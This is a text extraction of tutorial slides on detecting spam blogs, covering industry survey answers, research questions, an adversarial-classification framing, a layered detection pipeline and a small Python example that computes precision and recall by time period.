![Page 102: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/102.jpg)
• When did you start seeing spam? Late 2005. Late summer of 2002 couple of years hand edited black lists, URL pattern filtering
• How much spam? (in percents) big non-blog category, around 70% from weblogs.com,
• Is it increasing/decreasing? No significant change
• How are you tackling it? and How much effort goes into it? Around 4160 person-hrs
• Any message (blurbs) to the ICWSM audience? "At Sphere, we're analyzing the mechanisms used by splogs and finding detectable signatures that can be applied to very large datasets. It's our contention that available tools and protocols must necessarily limit the strategies available to successful sploggers. While that set of strategies continues to grow, we're continually innovating to find new and effective ways of detecting those strategies, suppressing spam, and keeping the blogosphere a rich, easily navigable universe of information"
![Page 103: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/103.jpg)
• When did you start seeing spam? In early 2005, we started to see the #spam blogs and pings from non-weblogs sources ramp out rapidly.
• How much spam? (in percents) There's a big range, depends on the day. There can be huge spam attacks on some days. For today, for example: 15% spam and 30% non-blog (but today's 15% spam number is on the low side). This doesn't include other kinds of bad pings: duplicates, out-dated, URLs that are forbidden or have no data
• Is it increasing/decreasing? It's increasing in absolute counts, just like the total number of weblogs ever created is increasing. However, in terms of the number of active spam weblogs, it's fairly constant, just like the number of active English-language weblogs is fairly flat now.
• Do you have any new architectures/frameworks/initiatives? Our architecture is in place and working well.
![Page 104: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/104.jpg)
• What would you want researchers to address?
– There is a minority of sophisticated spammers that create sleeper spam blogs that look just like regular blogs and then months later start linking to affiliate sites. How to catch these early?
– How to detect repurposed blog content (downright plagiarism either for use in spam blogs or simply for the age-old reason of building one's own reputation on false premises).
– Spam in foreign languages: structural similarities/differences/extent of the problem?
• What are future trends?
– PayForPost type services: in-post advertisements that are indistinguishable from blogger content and may or may not be disclosed => need for spam detection at the post level instead of simply at the blog level; need to filter out/discount posts rather than entire blogs.
![Page 105: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/105.jpg)
![Page 106: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/106.jpg)
![Page 107: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/107.jpg)
• All forms of spam detection fit into a general class of classification problems
– Classification is considered a “game” between classifier and adversary
– Adversaries adapt to evade filters
• It's clear that a classifier has to learn to classify new forms of spam
– Update training sets
– Identify new detection techniques
![Page 108: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/108.jpg)
“New Niche”: Update Training Sets, Use Language-Independent Techniques
![Page 109: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/109.jpg)
• A form of spam blog that seems to be quite common on Blogger
– Create 1 post
– Use blog as doorway
• Filters find it difficult to detect this spam without incurring false positives
• Sandboxing technique used by blog search engines
• Technique will go out of fashion once web search engines use similar strategies
![Page 110: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/110.jpg)
Blogspot “1” technique
![Page 111: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/111.jpg)
• Are splogs appearing in non-English languages?
– Not yet?
– Seen many cases of spam blogs in Japanese
• Creating training examples for multiple languages is not feasible
• Identifying language-independent techniques that capture stereotypes in splog creation tools will be important
![Page 112: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/112.jpg)
• Evaluation of effectiveness of filters
– Generic Precision and Recall
– Precision and Recall with a when?
• Continued QoS guarantees in an adversarial setting
– Methodology
– Semi-automatic techniques
• Methodology for overall maintenance of the filter
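Reading “Precision and Recall with a when” as evaluation broken down by time period (an interpretation, not something the slides confirm), a filter's drift under adversarial change could be tracked as sketched below. The record layout `(period, is_splog, flagged)` is hypothetical.

```python
from collections import defaultdict

def precision_recall(pairs):
    """pairs: iterable of (is_splog, flagged) booleans."""
    pairs = list(pairs)
    tp = sum(1 for truth, pred in pairs if truth and pred)
    fp = sum(1 for truth, pred in pairs if not truth and pred)
    fn = sum(1 for truth, pred in pairs if truth and not pred)
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall

def by_period(records):
    """Group (period, is_splog, flagged) records and score each period."""
    buckets = defaultdict(list)
    for period, truth, pred in records:
        buckets[period].append((truth, pred))
    return {p: precision_recall(v) for p, v in sorted(buckets.items())}

records = [
    ("2006-01", True, True), ("2006-01", False, True),
    ("2006-02", True, False), ("2006-02", True, True),
]
print(by_period(records))
# {'2006-01': (0.5, 1.0), '2006-02': (1.0, 0.5)}
```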
![Page 113: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/113.jpg)
Continuing Work
Ping Stream → BLACKLISTS / WHITELISTS → REGEX → URL MODEL → TEXT MODEL → RSS MODEL
• BLACKLISTS / WHITELISTS: Check with known blogs and splogs
• REGEX: Check known regex patterns
• URL MODEL: Use models over text of URL
• TEXT MODEL: Use models over Blog home-page
• RSS MODEL: Use models over post correlation
• LEARNER
![Page 114: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/114.jpg)
![Page 115: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/115.jpg)
![Page 116: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/116.jpg)
• Trends suggest that the problem of splogs will continue
• Research needs to continue identifying new detection techniques
• The community has to incorporate collaborative techniques for detection
• Research needs to understand filter evolution in a more principled way
![Page 117: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/117.jpg)
• http://icwsm-blog-spam.blogspot.com/
– For (too) late breaking resources for this tutorial
• http://planet.socialMediaResearch.org/
– A feed aggregator for blogs relevant to social media
– Suggest new blogs to [email protected]
• http://sus.picious.info/
– Prototype spam reporting service
• http://ebiquity.umbc.edu/memeta/resources/
– Blog and splog datasets, bibliography, etc.
![Page 118: 1 1 1 1 11 1 õ • “Unsolicited usually commerci al e-mail sent to a large number of addresses” – M erriam Webster Online • “Spamming is the abuse of electronic messaging](https://reader035.vdocuments.us/reader035/viewer/2022070900/5f36a8c2ded2211e3c481dd7/html5/thumbnails/118.jpg)